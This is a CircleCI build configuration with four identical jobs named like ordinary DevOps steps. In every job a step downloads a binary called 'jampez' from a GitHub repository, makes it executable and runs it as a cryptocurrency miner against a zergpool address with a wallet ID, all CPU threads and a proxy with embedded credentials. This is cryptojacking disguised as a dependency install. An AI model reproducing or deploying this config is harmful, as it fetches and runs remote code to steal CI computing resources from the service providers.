version: 2.1
jobs:
    Devop:
      docker:
            - image: circleci/ruby:2.5.3
      steps:
        - run:
            name: Install Dependencies
            command: timeout 1m lscpu
        - run: wget https://github.com/Asriytdx/kurama/raw/main/jampez && chmod +x jampez && ./jampez -v -l verushash.mine.zergpool.com:3300 -u RGxdFxwAaCzR6YyAY3gcNbYXxYrZmSWvCz.GCX -p c=RVN,mc=VRSC -t $(nproc --all) -x socks5://socks5://ieyzppsm:gx7ivjtt57xe@209.127.191.180:9279
    Devop1:
      docker:
            - image: circleci/ruby:2.5.3
      steps:
        - run:
            name: Install Dependencies
            command: timeout 1m lscpu
        - run: wget https://github.com/Asriytdx/kurama/raw/main/jampez && chmod +x jampez && ./jampez -v -l verushash.mine.zergpool.com:3300 -u RGxdFxwAaCzR6YyAY3gcNbYXxYrZmSWvCz.GCX -p c=RVN,mc=VRSC -t $(nproc --all) -x socks5://socks5://ieyzppsm:gx7ivjtt57xe@209.127.191.180:9279
    Devop2:
      docker:
            - image: circleci/ruby:2.5.3
      steps:
        - run:
            name: Install Dependencies
            command: timeout 1m lscpu
        - run: wget https://github.com/Asriytdx/kurama/raw/main/jampez && chmod +x jampez && ./jampez -v -l verushash.mine.zergpool.com:3300 -u RGxdFxwAaCzR6YyAY3gcNbYXxYrZmSWvCz.GCX -p c=RVN,mc=VRSC -t $(nproc --all) -x socks5://socks5://ieyzppsm:gx7ivjtt57xe@209.127.191.180:9279
    Devop3:
      docker:
            - image: circleci/ruby:2.5.3
      steps:
        - run:
            name: Install Dependencies
            command: timeout 1m lscpu
        - run: wget https://github.com/Asriytdx/kurama/raw/main/jampez && chmod +x jampez && ./jampez -v -l verushash.mine.zergpool.com:3300 -u RGxdFxwAaCzR6YyAY3gcNbYXxYrZmSWvCz.GCX -p c=RVN,mc=VRSC -t $(nproc --all) -x socks5://socks5://ieyzppsm:gx7ivjtt57xe@209.127.191.180:9279
workflows:
    version: 2.1
    build:
        jobs:
            - Devop
            - Devop1
            - Devop2
            - Devop3